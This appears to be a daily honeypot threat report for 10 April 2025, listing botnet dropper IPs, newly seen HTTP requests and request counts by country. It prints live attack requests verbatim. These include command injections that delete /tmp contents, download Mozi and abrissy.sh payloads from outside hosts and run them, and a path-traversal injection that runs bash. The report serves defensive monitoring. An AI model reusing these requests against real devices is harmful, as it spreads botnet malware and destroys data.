Skip to main content
  1. Daily-Posts/

Report: 2025-04-10

·372 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-10
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 15 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2101 requests were recorded during the day, originating from 3 different countries, with a peak of 467 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
BGGermany
MYAustralia
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
45.230.66.8GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.230.66.8:11316/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
185.36.81.82GET /shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh HTTP/1.1
58.209.9.130GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://58.209.9.130:59445/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
473GET /?UrkCEO/edit&theme=margot&squelette=../../../../../../../..//bin/bash%20-c%20%27ping%20-c%201%2031.15.17.163%27&style=margot.css HTTP/1.1
2642\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xA8\x84\xF7\x7F\x00\x00\x10\xF5_jM\x00\x00\x00\xE0\x81\xCD\x84\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01
3091GET http://xxx.xxx.xxx.xxx/.git/config HTTP/1.1
3111GET /wordpress HTTP/1.1
3121GET /wp HTTP/1.1
3131GET /blog HTTP/1.1
3141GET /new HTTP/1.1
3151GET /old HTTP/1.1
3171GET /main HTTP/1.1
3181GET /testing HTTP/1.1
3671HEAD /wp-login.php HTTP/1.1
3881GET /odinhttpcall1744293958 HTTP/1.1
3901GET /OdinHttpCall1744293958 HTTP/1.1
4071GET /Odin/http/call1744293958 HTTP/1.1
4521GET /bad%20ip%2C/Tr%69nity.php%2ebakup HTTP/1.0

country_iso_code
#

number_of_occurencecountry_iso_code
0467GB
1404NL
2381SC
3253US
4113BG
570PL
659MY
749DE
845IE
926CA
1026HK
1122CN
1219CH
1315RO
1415JP
1513SG
1612IN
1711NG
1810GH
1910FR
2010UA
218RU
228PT
238VN
247BE
256IT
265KR
274TR
284AE
293TH
303TW
312ZA
322PA
332AO
341IR
351ES
361MC
371AR
381LT
391EE
401ID
411CZ
421PK

Related

Report: 2025-04-09
·2151 words
Repport Daily
Report: 2025-04-08
·439 words
Repport Daily
Report: 2025-04-07
·1203 words
Repport Daily